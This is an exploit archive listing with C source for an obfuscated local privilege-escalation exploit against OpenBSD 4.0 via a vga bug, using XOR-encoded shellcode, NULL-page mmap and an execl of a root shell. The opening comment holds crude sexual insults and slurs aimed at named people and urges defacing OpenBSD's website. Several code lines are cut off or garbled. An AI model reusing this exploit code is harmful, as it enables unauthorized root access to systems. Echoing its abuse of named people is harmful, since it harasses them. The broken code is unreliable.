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Posted Jul 1, 2008
Site lul-disclosure.net

Local root animated,.. yes animated, exploit for OpenBSD 4.0 that takes advantage of an old vga vulnerability.

tags | exploit, local, root
systems | openbsd
SHA-256 | 05a5748f1af55846e0a479394638686b4df1a965f1d7e2a30859e306e7a32af9


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* My final contribution, DA WORLD'S FIRST ANIMATED EXPLOIT!, is the foundation
* for the next generation of OpenBSD exploits, crafted to burn Theo's eyes and make
* him spend countless hours not only exercising his supreme reversing skills
* but also delay his already deadly slow patch release timing. Hopefully every
* fucktard out there willing to release an exploit for one of the many OpenBSD
* locally exploitable issues, will give this insanely advanced code a good use.
* Make sure you include some sanity checks (ie. if uid == 0 and hostname ==
* cvs.openbsd.org make it do something creative like updating their index.html
* once in a while).
* I would like to thank the following people for all the support, fun and
* inspiration during my pilgrimage through the incredibly broken community known
* as the security industry:
* Jesus H. Christ, Brute Dong, Bob, GOBBLES, towlie, noir and spender.
* I could name several people that I would love to either curbstomp or rape
* anally (enjoying every inch of their rectum, though many of them would enjoy
* the experience too, i know you dig dicks guys!), but I'll be a nice kid and
* simply say that I love how this hdm, jf, FAilja, et al are nothing but
* cock monglers. I enjoy how some of them have lost their jobs or got banned
* by US immigration. And I also thank McDonalds for making you fatfucks get more
* obese and ugly every year. And I'm sorry for the poor strippers that have to
* stand the reality of being the only thing ressembling a woman you've ever had
* the opportunity to see naked, besides your crack head cock-gobbling mom when
* she sodomized you with a chop stick (and we know you liked it).
* Hehehehe. BANANA! BANANA! BANANA! BTW, has gadi evron stopped crying for cocks
* on craigslist men seeking men board? That fat fuck is sick. LULZ!
* OpenBSD is obsolete, aged, poorly designed, worsly developed and horribly
* maintained. And led by a guy who needs to take his head out of his frozen
* This exploit abuses an old bug to gain root privileges on an OpenBSD 4.0
* system. The ipv6 bug was never fully implemented because this shit made
* -- 2008 - by LMH
#include /*pax*/<string.h>/*drepper libc rocking on*//**//**//**//**//**//* */
#include /*It seems to me so strange*/<stdlib.h>/*tax*//**//**//**//**//**//* */
#include /*aint*/<stdio.h>/*mmap NULL rocking the kernel on*//**//**//**//**//**/
#include /*Check wallet for her name*/<unistd.h>/*lax!*//**//**//**//**//**//**/
#include /*Her face is in the muck*/<sys/param.h>/**//**//**//**//**//**//* * */
#include /*Her face is in the muck*/<err.h>/**//**//**//**//**//**//**//**//* */
#include /*I think her zippers stuck*/<sys/ioctl.h>/*death OPENBSD SECURE */
#include /*It is perfect for me*/<sys/syscall.h>/*threats THANKS TO PAX */
#include /*To practice surgery*/<fcntl.h>/**//**//* ######### BUY */
#include /*One look coagulates*/<sys/types.h>/*mail ##horror## ### SPENDER */
#include /*Its time to operate*/<sys/stat.h>/*arrives #sick### ### A NEW */
#include /*Just keep it going*/<sys/mman.h>/*pain ###pain##### ### POSTER! */
#include /*Just keep it going*/<sys/sysctl.h>/*feels ##dumb### ############*/
#define /*Just keep it going*/ma main/*theo: ##feels########## ance M #######*/
#define /*Shes not dead, shes gonna live*/s /*fuck*/stdout/*## Havok #######*/
#define /*Shes not dead, shes gonna live*/x fflush/*the ######################*/
#define /*I see her eyes rolling back in her head*/_s /*pain*/sleep/* GG NOIR */
#define /*Come on lets take her home*/f for/**//**//**//**//**//**//**//**//* */
#define /*I think i heard her groan*/v /*what*/void/**//**//**//**//**//**//* */
#define /*Hold on or she will sink*/__0 while/**//**//**//**//**//**//**//* */
#define /*Just keep it going*/_c /*is*/char/*acter issues*//**//**//**//**//* */
#define /*You can fake it*/_____ sizeof/**//**//**//**//**//**//* *//**//* */
#define /*It's time to operate*/____ /*the*/printf/**//**//**//**//**//**//* */
#define /*It's time to operate*/___ return/**//**//**//**//**//**//* *//**//**/
#define /*It's time to operate*/__ /*of*/int/**//**//**//**//**//**//**//**//**/
#define /*It's time to operate*/_t static/**//**//**//**//**//**//**//**//* */
#define /*It's time to operate*/_ki struct kinfo_proc/**//**//**//**//**//* */
#define /*It's time to operate*/_pi pid_t/**//**//**//**//**//**//* *//**//**/
#define /*It's time to operate*/______ unsigned int/**//**//**//**//**//**//* */
#define /*It's time to operate*/_______ err/**//**//**//**//**//**//* *//* */
#define /*It's time to operate*/__ki exit/**//**//**//**//**//**//* *//**//* */
#define /*It's time to operate*/__sy sysctl/**//**//**//**//**//**//* *//* */
#define /*Heroin winner cup.*/ctkrn (__)0x00000000/**//**//**//**//**//**//* */
#define /*It's time to operate*/kproc (__)0x0000000E/**//**//**//**//**//**//**/
#define /*Inject. Overdose. End.*/kppid (__)(/**/ctkrn+/**/0x00000001)/**//* */
#define /*That cigar tube smells like lost elections*/dirtysanchez mmap/**//* */
#define /*It's time to operate*/________/**/printf/**//**//**//**//**//**//* */
#define /*It's time to operate*/_________/**/unsigned long/**//**//**//**//* */
#define /*It's time to operate*/_m/**/memcpy/**//**//**//**//**//**//**//* */
#define /*It's time to operate*/__________/**/setuid/**//**//**//**//**//**//**/
#define /*It's time to operate*/___________/**/seteuid/**//**//**//**//**//* */
#define /*It's time to operate*/____________/**/execl/**//**//**//**//**//* */
#define aaaaaaaaaaaaaaaa O_RDWR
#define ____rw_c_ (aaaaaaaaaaaaaaaa|O_CREAT)
#define ____se_e_ (S_IRUSR|S_IWUSR)
#define reopen close
#define _w_w_w_w_w_w_w_w write
#define meltwax PROT_READ|PROT_EXEC
#define raadt MAP_FIXED
#define openbsdsec MAP_FAILED
#define molest syscall
#define provos SYS_ioctl

_c macaddr[]=""; // Used for ICMPv6 exploit: VMWare network interface mac addr

/* many years... *Theo sheds a FREE tear* Sigh.
RCS file: /usr/OpenBSD/cvs/www/index.html,v
retrieving revision 1.548
retrieving revision 1.549
diff -u -r1.548 -r1.549
--- www/index.html 2007/03/12 17:21:59 1.548
+++ www/index.html 2007/03/13 22:39:47 1.549
@@ -78,7 +78,7 @@
<a href="art1.html"><img border="0" src="images/puffy40.gif" height=199
<center><strong><font color="#e00000">
-Only one remote hole in the default install, in more than 10 years!<br>
+Only two remote holes in the default install, in more than 10 years!<br>
The OpenBSD project produces a <b>FREE</b>, multi-platform 4.4BSD-based

_c shlr[]="\xc9\xd1\xd1\xd1\xc9\xd1\xd1\xd1\xc9\xd1\xd1\xd1\xc9\xd1\xd1\xd1\xc9"
"\x5a\xc2\x58\x93\xd5\x69\x80\x96\x99\x01\x2e\x31\xd1"; double obsdv;_________//
mg1=0x21524110;_________ mg2=0xcc99e897;_________ mg3=0xffffffff;_________ mg4=
0x12345678;_c shl[]="\x85\xc8\xc3\xc4\x85\xd9\xc2\xaa";v gpr(_pi dp,_ki *kp);///
_c tks[]="\x6e\x35\x2c\x31\x6e\x35\x29\x24\x2e\x6f\x19\x19\x19\x19\x19\x41";_c

_t v evi(){_________ rts[2]={0xee5f9be,0xebdfc46};__ i,moo,moooo;v *p;_________
ppa;_ki kp;rts[0]=rts[0]^(mg1^mg3);rts[1]=rts[1]^(mg2^mg4);gpr((_pi)getpid(),//
"\x53\x68\x65\x6c\x6c\x63\x6f\x64\x65\x3a\x20""%u bytes at %p\x0a",(unsigned)//
____________(shl,"sh",(v *)ctkrn);

double vobsd(){__ rg[2],l;_c *p;double re;rg[0]=CTL_KERN;rg[1]=KERN_OSRELEASE;
if(__sy(rg,2,NULL,(size_t *)&l,NULL,0)==-1){_______(1,"\x73\x79\x73\x63\x74\x6c"
);}if((p=malloc(l))==NULL){_______(1,NULL);}if(__sy(rg,2,p,(size_t *)&l,NULL,0)
"\x65\x63\x74\x65\x64\x3a\x20""%s (%f)\n",p,re);free(p);___ re;}v uss(){____(/**/
"\x72\x6f\x6f\x74\x2e\x20\x4f\x70\x65\x6e\x42\x53\x0a\x0a");__ki(-1);}v gpr(_pi dp,
_ki *kp){__ rg[4],l;rg[0]=ctkrn;rg[1]=kproc;rg[2]=kppid;rg[3]=dp;l=_____(_ki);if(
__sy(rg,4,kp,(size_t *)&l,NULL,0)<0){_______(1,"\x73\x79\x73\x63\x74\x6c");_______
"\x70\x72\x6f\x63\x20\x73\x74\x72\x75\x63\x74\x75\x72\x65\x21\x0a");}}_t v xo(_c
u[],______ l,__ k){______ i;f(i=0;i<l;i++){u[i]=u[i]^k;}}_t __ was=0;v pg(__ w,_c
*rr[],__ nz,__ wsn){__ i,b;_c *u=0;__0(was<wsn){f(i= 0;i<nz;i++){u=rr[i];f(b=0;b
*/__ ma(__ a,_c **g){_c *theosmovie[]={"\x53\x75\x63\x6b\x69\x6e\x67"/**//**//**/
"\x20\x20\x20","Fuck the pain away? Fuck the pain away!\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20","Fuck the pain away! Fuck the pain away?\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20","Fuck the 0day away. Fuck the pain away!"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20","Fuck the pain away! Fuck the"
" pain away?\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20","Fuck the 0day aw"
"ay? Fuck the pain away!\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"};____(
"\x20\x50\x65\x61\x63\x68\x65\x73\x2e\x0a\x0a");/* Fuck the 0day away. */ if(a<2
){uss();}obsdv=vobsd();pg(80,theosmovie,_____(theosmovie)/_____(_c *),1);xo(shl,
gde,_____(gde), 0x2f);if(obsdv==4.0&&!strcmp(g[1],"vga")){evi();}

/*That's it.*/___ 0;}/*Easy to fingerprint, eh?*/

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